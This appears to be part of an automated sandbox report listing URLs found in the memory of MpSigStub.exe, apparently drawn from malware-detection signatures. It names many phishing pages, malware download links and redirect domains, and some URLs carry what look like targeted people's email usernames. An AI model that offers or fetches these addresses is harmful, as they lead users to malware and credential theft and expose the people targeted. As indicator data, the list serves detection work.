Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://rollingrockcolumbia.com/wp-admin/admin-ajax.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://rotf.lol/3u6d9443
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://rw.mousewinning.club/?
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080008.xml
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/119/10080009.xml
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/900/10010045.xml
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: https://s.xcodelib.net/updates/ff/apps/appPrefId/affPrefId.xml
Source: MpSigStub.exe, 00000024.00000003.6323790490.00000197A4866000.00000004.00000001.sdmp	String found in binary or memory: https://s1.ax1x.com/2020/04/28/J4Zp9S.png
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: https://s18.picofile.com/d/8435906618/a27ddc7a-8599-479b-9e19-f2fd4b1988c3/setup.exe
Source: MpSigStub.exe, 00000024.00000003.6436704102.00000197A4AFA000.00000004.00000001.sdmp	String found in binary or memory: https://s3-ap-northeast-1.amazonaws.com/update-secure/asmsgrbarb.zip
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://s3-eu-west-1.amazonaws.com/adkooo/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://s3.amazonaws.com/exec459/exec.tgz
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://s3.us-east-2.amazonaws.com/cotazion.pago/recibo.html
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://sad-goldwasser.62-108-34-75.plesk.page/doc00289?
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: https://scabraldealdun.com/hghgh/aridonorigin.exe
Source: MpSigStub.exe, 00000024.00000003.6307248389.00000197A3A78000.00000004.00000001.sdmp	String found in binary or memory: https://scalet.publicvm.com/large2/next.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: https://scaricapag.win/eco
Source: MpSigStub.exe, 00000024.00000003.6439090002.00000197A49F2000.00000004.00000001.sdmp	String found in binary or memory: https://screw-malwrhunterteams.com/scanme.txt
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://sddfdfdf.typeform.com/to/vrfwamwx
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://secure.hotbar.com/
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp, MpSigStub.exe, 00000024.00000003.6341224894.00000197A35D4000.00000004.00000001.sdmp	String found in binary or memory: https://secure.logmeinrescue.com/
Source: MpSigStub.exe, 00000024.00000003.6280960340.00000197A4381000.00000004.00000001.sdmp	String found in binary or memory: https://secure.tibia.com/account/?subtopic=accountmanagement
Source: MpSigStub.exe, 00000024.00000003.6433381009.00000197A3C87000.00000004.00000001.sdmp	String found in binary or memory: https://secured-links.org/connect
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://secureloginauth.ru/mcavy/.dave.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://securezalink.com/home.jpg/security.ocx
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://seeing.mm.am/deluxe/
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://selmersax.de/wp-content/themes/rehub/bpge/front/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://serv.fkn-srv.xyz/?e=tom.hughes
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://server.voiplogger0365.xyz/?e=csizemore
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://seyedishop.ir/rh1/pmt.php
Source: MpSigStub.exe, 00000024.00000003.6339573341.00000197A3E6C000.00000004.00000001.sdmp	String found in binary or memory: https://shaastraarth.in/bbbg/
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://shatha.n-idea.us/moo/
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: https://shop.asopalav.com/ds/0302.gif
Source: MpSigStub.exe, 00000024.00000003.6303130875.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://shoplady.xyz/glsdil.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://shoptimes.ro/admin/clienti/opo.php
Source: MpSigStub.exe, 00000024.00000003.6437085765.00000197A4B7D000.00000004.00000001.sdmp	String found in binary or memory: https://shouldntthrowstones.co.uk/vv/exl-idnero.php?loginhtw952
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://shreyainfosoft.com/krishnasteelcorporation/next.php
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://shreyainfosoft.com/shayonajwellers/after.php
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://signin.ebay
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://simetrika.com/redirect/zg9uywxklmvhdmvzqgfjy2vsbgvudc5jb20=
Source: MpSigStub.exe, 00000024.00000003.6434542406.00000197A437F000.00000004.00000001.sdmp	String found in binary or memory: https://sinavtakvim.icu/zx/ag.doc
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://sis.ieadar.com.br-$r)r/Igreja-master/agendaSec/css/Sq4D0WfbvSitsO.php
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://skripon.com/oozoo/document.php
Source: MpSigStub.exe, 00000024.00000003.6305465801.00000197A4278000.00000004.00000001.sdmp	String found in binary or memory: https://smartcheckautos%.com/wp%-content/%.%.%./%.%.%./x3%.php
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://smesalvado.sslblindado.com/d.doc
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://smpn1kunjangkediri.sch.id/wp-content/uploads/upgrabe/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://snowfall.top/eusetup.exe
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://soft-gps.com/wp-content/plugins/cvuohucwkp/tre/swt.php
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://sotheraho.com/wp-content/fonts/reportexcelnew.php
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: https://southpolefaxnet.ml/number/brand.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://southvomes.sozouths.xyz/?e=
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: https://specs2go.shawalzahid.com/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://ssl-proxy.my-addr.org/myaddrproxy.php/http://
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/Juliana.jpg
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/grdmody.jpg
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://ssl859.websiteseguro.com/downloadflash/dados/msnGRD.jpg
Source: MpSigStub.exe, 00000024.00000003.6324553749.00000197A3B81000.00000004.00000001.sdmp	String found in binary or memory: https://ssmdevelopers.in/4raxigaptfpm/yu.html
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://staging2.lifebiotic.com/novacms/grassandrocks.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://staralevator.com/anygas/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://staralevator.com/anygas/nxt.php
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://static.wixstatic.com/ugd/05e470_b104c366c1f7423293887062c7354db2.doc
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://static.wixstatic.com/ugd/859f79_35181f339d694f87870220aa3da46c30.doc
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: https://statsdev.com/header.jpg
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: https://statseast.com/login.jpg
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://statsmag.com/apple/log.php
Source: MpSigStub.exe, 00000024.00000003.6344719591.00000197A3659000.00000004.00000001.sdmp	String found in binary or memory: https://statsper.com/footer.jpg
Source: MpSigStub.exe, 00000024.00000003.6306777580.00000197A39F4000.00000004.00000001.sdmp	String found in binary or memory: https://statssale.com/header.jpg
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://stepup.pt/sugar6/ww/s.dot
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://stitch-statichosting-prod.s3.amazonaws.com/5ffbf74f106b1ff88367ac90/5ffbf62cd17b985f24b01f73
Source: MpSigStub.exe, 00000024.00000003.6274632476.00000197A2E92000.00000004.00000001.sdmp	String found in binary or memory: https://storage.googleapis.com/
Source: MpSigStub.exe, 00000024.00000003.6278189283.00000197A3970000.00000004.00000001.sdmp	String found in binary or memory: https://storage.googleapis.com/msofficeupdater/MSUpdater.exe
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://storage.googleapis.com/officexel/remittance%20invoice.zip
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://storagepinetown.co.za/1/14/?email=itsupport
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://storyofusstudios.com/n75oh9tzoyhz/lipa.html
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://stretchbuilder.com/chalkzone/next.php
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://stretchwrestle.com/ringcentral/wealth.php
Source: MpSigStub.exe, 00000024.00000003.6271076584.00000197A3A37000.00000004.00000001.sdmp	String found in binary or memory: https://subahj.linkpc.net/sarah2/next.php
Source: MpSigStub.exe, 00000024.00000003.6314983719.00000197A2F51000.00000004.00000001.sdmp	String found in binary or memory: https://submit-form.com/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://subwaybookreview.com/vl1/sample.doc
Source: MpSigStub.exe, 00000024.00000003.6293096859.00000197A3151000.00000004.00000001.sdmp	String found in binary or memory: https://suggestor.pirrit.com/engine/getpopups.php
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: https://sumnermail.org/sumnerscools/school.php
Source: MpSigStub.exe, 00000024.00000003.6321843775.00000197A2FD4000.00000004.00000001.sdmp	String found in binary or memory: https://sundersls.weebly.com
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://supplementsizeup.co.uk/aa/ger/login.php
Source: MpSigStub.exe, 00000024.00000003.6429536769.00000197A4656000.00000004.00000001.sdmp	String found in binary or memory: https://surustore.com/imageY9a
Source: MpSigStub.exe, 00000024.00000003.6271796009.00000197A32DD000.00000004.00000001.sdmp	String found in binary or memory: https://sviescfze.com/iaret52086yla/next.php
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://sviescfze.com/ns735tey89dgwmo/next.php
Source: MpSigStub.exe, 00000024.00000003.6415513577.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://sweetsizing.com/vip/
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://syr.us/gpn
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://t.co/ou2k0nuvi8)
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/File
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/IamLev1
Source: MpSigStub.exe, 00000024.00000003.6288205941.00000197A4D62000.00000004.00000001.sdmp	String found in binary or memory: https://t.me/IamLev1x
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://tales.pt/webmail-purchase/reportexcel.php
Source: MpSigStub.exe, 00000024.00000003.6326212702.00000197A31D5000.00000004.00000001.sdmp	String found in binary or memory: https://tapro-trgovina.com/slimneweurope/next.php
Source: MpSigStub.exe, 00000024.00000003.6272683059.00000197A4405000.00000004.00000001.sdmp	String found in binary or memory: https://tapro-trgovina.com/yalladg/
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://tdgnaples.com/.howe
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: https://techportal.cerner.com/api/validateProjectNumber?projectNumber=
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://tecnicopconline.com/wp-admin/jekbvhub.php
Source: MpSigStub.exe, 00000024.00000003.6352999953.00000197A3469000.00000004.00000001.sdmp	String found in binary or memory: https://tegavu.com
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://telegra.ph/
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://ternerdrivew.at/3/wwf.dll
Source: MpSigStub.exe, 00000024.00000003.6438240606.00000197A36DD000.00000004.00000001.sdmp	String found in binary or memory: https://ternerdrivew.at/3/wwf.exe
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://testweb.public360saas.se:443/biz/v2-pbr/docprod/templates/bot_tjansteskrivelse.docx
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://thecloud-jewels.com/wp-content/themes/storefront/inc/admin/ms
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://thersshy.dynssl.com//
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://thersshy.dynssl.com//post.php
Source: MpSigStub.exe, 00000024.00000003.6323089969.00000197A3C04000.00000004.00000001.sdmp	String found in binary or memory: https://thewatch-tv.com/guyofficeaprof/post.php
Source: MpSigStub.exe, 00000024.00000003.6291492327.00000197A37E5000.00000004.00000001.sdmp	String found in binary or memory: https://thiscannotpossiblywork.local/
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: https://tiagogalindo.com.br/1/ksu/index.html
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://ticket.webstudiotechnology.com/sc/wp-includes/SimplePie/XML/Declaration/ytUsz4l0Qo.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: https://timbeck.net/redirect/ywxpbmeuc2vyymfulwjhcmj1qgrpbnvszwdhbc5ybw==
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/
Source: MpSigStub.exe, 00000024.00000003.6348335236.00000197A3259000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/bptvnhw6
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/j7tx7h8)
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/up77pck
Source: MpSigStub.exe, 00000024.00000003.6435021591.00000197A4A76000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/y7rku84vscrobj.dll
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/yaozbad7
Source: MpSigStub.exe, 00000024.00000003.6435742963.00000197A3D91000.00000004.00000001.sdmp	String found in binary or memory: https://tinyurl.com/yarknmzj
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: https://tiw0dspxozds.azurewebsites.net/fdoi
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://tomamate.si/
Source: MpSigStub.exe, 00000024.00000003.6290858289.00000197A33BE000.00000004.00000001.sdmp	String found in binary or memory: https://toulousa.com/omg/rockspa.php
Source: MpSigStub.exe, 00000024.00000003.6303735122.00000197A3500000.00000004.00000001.sdmp	String found in binary or memory: https://towingnow.ca/LvR2HWHdQ.php
Source: MpSigStub.exe, 00000024.00000003.6342863444.00000197A4F72000.00000004.00000001.sdmp	String found in binary or memory: https://tph786.com/gym/assets/css/
Source: MpSigStub.exe, 00000024.00000003.6323451282.00000197A3C46000.00000004.00000001.sdmp	String found in binary or memory: https://tr.im/1azmq)
Source: MpSigStub.exe, 00000024.00000003.6330297949.00000197A369B000.00000004.00000001.sdmp	String found in binary or memory: https://track.fourtiz.com
Source: MpSigStub.exe, 00000024.00000003.6324198203.00000197A492C000.00000004.00000001.sdmp	String found in binary or memory: https://tradingdashboards.com/
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/123?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/aws?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/shook?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: https://trafffi.ru/strik?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/123?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/aws?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/shook?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: https://traffking.ru/strik?utm_term=
Source: MpSigStub.exe, 00000024.00000003.6291090515.00000197A33E4000.00000004.00000001.sdmp	String found in binary or memory: https://transfer.sh/
Source: MpSigStub.exe, 00000024.00000003.6277859035.00000197A392F000.00000004.00000001.sdmp	String found in binary or memory: https://trex-miner.com
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://trinitas.or.id/templates/jakarta/images/addons/msg.jpg
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.cc/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.club/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.com/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.link/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.me/
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://ttraff.ru/
Source: MpSigStub.exe, 00000024.00000003.6430707943.00000197A4B3C000.00000004.00000001.sdmp	String found in binary or memory: https://tubestore.com.br/wp-content/p_bn/
Source: MpSigStub.exe, 00000024.00000003.6341931442.00000197A45E4000.00000004.00000001.sdmp	String found in binary or memory: https://tweetperks.com/lbim8w/
Source: MpSigStub.exe, 00000024.00000003.6429813058.00000197A4697000.00000004.00000001.sdmp	String found in binary or memory: https://twitter.com/eduClient
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: https://u.nu/920yx
Source: MpSigStub.exe, 00000024.00000003.6308253805.00000197A3EDD000.00000004.00000001.sdmp	String found in binary or memory: https://u.nu/e6b2i
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://u.nu/edc63
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://u6947877.ct.sendgrid.net/wf/click?upn=aum5tbbw0s-2boddc9wvl76ffmwkftnihk7jwmiyskchpxyq1lorjb
Source: MpSigStub.exe, 00000024.00000003.6441079311.00000197A4E6A000.00000004.00000001.sdmp	String found in binary or memory: https://uae-signs.com/wp-includes/SimplePie/Content/project1/PROJRCT-B.exe
Source: MpSigStub.exe, 00000024.00000003.6437415503.00000197A38EC000.00000004.00000001.sdmp	String found in binary or memory: https://uaeub.com/ds/161120.gif
Source: MpSigStub.exe, 00000024.00000003.6431842764.00000197A4D63000.00000004.00000001.sdmp	String found in binary or memory: https://uis.public360online.com:443/biz/v2-pbr/docprod/templates/_uis%20moteinnkalling_referat.docx
Source: MpSigStub.exe, 00000024.00000003.6436377560.00000197A4C85000.00000004.00000001.sdmp	String found in binary or memory: https://uniquestyle.dk/wp-content/themes/ifeaturepro5-child/gr.mpwq
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates1.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates2.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/WdCpSrvc.asmx
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/bond/submitReport
Source: MpSigStub.exe, 00000024.00000003.6279973273.00000197A4489000.00000004.00000001.sdmp	String found in binary or memory: https://unitedstates4.cp.wd.microsoft.us/wdcp.svc/submitReport
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://updatesdomainn.ml/
Source: MpSigStub.exe, 00000024.00000003.6338261504.00000197A4590000.00000004.00000001.sdmp	String found in binary or memory: https://updatesdomainn.ml/post.php
Source: MpSigStub.exe, 00000024.00000003.6315850680.00000197A403E000.00000004.00000001.sdmp	String found in binary or memory: https://upload.cat/
Source: MpSigStub.exe, 00000024.00000003.6318964208.00000197A48A9000.00000004.00000001.sdmp	String found in binary or memory: https://upload.wikimedia.org/wikipedia/commons/
Source: MpSigStub.exe, 00000024.00000003.6432316317.00000197A4DA4000.00000004.00000001.sdmp	String found in binary or memory: https://uploadvirus.com/uploads/
Source: MpSigStub.exe, 00000024.00000003.6315705690.00000197A4027000.00000004.00000001.sdmp	String found in binary or memory: https://upt.fastsearch.me/
Source: MpSigStub.exe, 00000024.00000003.6428495405.00000197A2E93000.00000004.00000001.sdmp	String found in binary or memory: https://upurl.me/vvkzd
Source: MpSigStub.exe, 00000024.00000003.6337394565.00000197A4314000.00000004.00000001.sdmp	String found in binary or memory: https://urbanhomefitness.com/file/excelzz/index.php?email=
Source: MpSigStub.exe, 00000024.00000003.6440424598.00000197A4487000.00000004.00000001.sdmp	String found in binary or memory: https://uringvermi.at/3/zet.dll
Source: MpSigStub.exe, 00000024.00000003.6441407992.00000197A4404000.00000004.00000001.sdmp	String found in binary or memory: https://urldefense.proofpoint.com/v2/url?u=http-3a__entreverodomoha.com.br_7_index.php-3f-3f-3fr-3fw
Source: MpSigStub.exe, 00000024.00000003.6322693408.00000197A3BC3000.00000004.00000001.sdmp	String found in binary or memory: https://utilities.pcpitstop.com
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: https://vamoss.com.br/blogfolio/wp-content/upgrabe/
Source: MpSigStub.exe, 00000024.00000003.6336985744.00000197A3426000.00000004.00000001.sdmp	String found in binary or memory: https://vaqww.dyndns.dk/tolly5/
Source: MpSigStub.exe, 00000024.00000003.6346866223.00000197A4C8E000.00000004.00000001.sdmp	String found in binary or memory: https://vaqww.dyndns.dk/tolly5/next.php
Source: MpSigStub.exe, 00000024.00000003.6317535190.00000197A4F30000.00000004.00000001.sdmp	String found in binary or memory: https://vespang.cf/aggreey/post.php
Source: MpSigStub.exe, 00000024.00000003.6439501262.00000197A4A33000.00000004.00000001.sdmp	String found in binary or memory: https://victoriaparkmazda-my.sharepoint.com/personal/ann_victoriaparkmazda_co_uk/_layouts/15/guestac
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: https://vieeewen.org/ddy/next.php
Source: MpSigStub.exe, 00000024.00000003.6319752266.00000197A3FE5000.00000004.00000001.sdmp	String found in binary or memory: https://vieeewen.org/tgg/next.php
Source: MpSigStub.exe, 00000024.00000003.6430342028.00000197A4BC0000.00000004.00000001.sdmp	String found in binary or memory: https://viro.mleydier.fr/noauth
Source: MpSigStub.exe, 00000024.00000003.6273475176.00000197A3D51000.00000004.00000001.sdmp	String found in binary or memory: https://vm.jt-voicem.club/?e=ckoonce
